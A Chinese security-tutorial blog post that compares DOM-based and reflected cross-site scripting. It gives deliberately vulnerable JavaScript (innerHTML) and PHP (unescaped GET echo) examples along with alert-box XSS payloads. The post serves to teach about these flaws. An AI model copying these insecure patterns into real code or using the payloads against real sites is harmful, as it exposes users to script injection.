白帽子(3)- xss反射与dom攻击对比

Dom XSS攻击

关于xss攻击的分类可以参考以前的文章:xss分类
注意:对于DOM XSS类型的攻击与反射性的区别在于:DOM XSS是javascript处理输出, 而反射性xss是后台程序处理
示例与pyload如下, DOM XSS直接通过javascript执行,程序并不会返回后台进行处理

<script>
    function test() {
        var str = document.getElementById("text").value;
        document.getElementById("t").innerHTML = "<a href='"+str+"' >testLink</a>";
    }
</script>
<div id="t" ></div>
<input type="text" id="text" value="" />
<input type="button" id="s" value="write" onclick="test()" />

对应的pyload为:

  • ' onclick=alert(/xss/) // 点击后需要点击超链接才能弹出;
  • '><img src=# onerror=alert(/xss/) /><'

反射型的XSS:

反射型的xss是需要将请求提交到后台,由后台程序执行返回javascript语言后,出现漏洞,如下

<?php
// Is there any input?
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
	echo '<pre>Hello ' . $_GET[ 'name' ] . '</pre>';
}
?>

对应的攻击payload:
<script>alert('1')</script>

  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值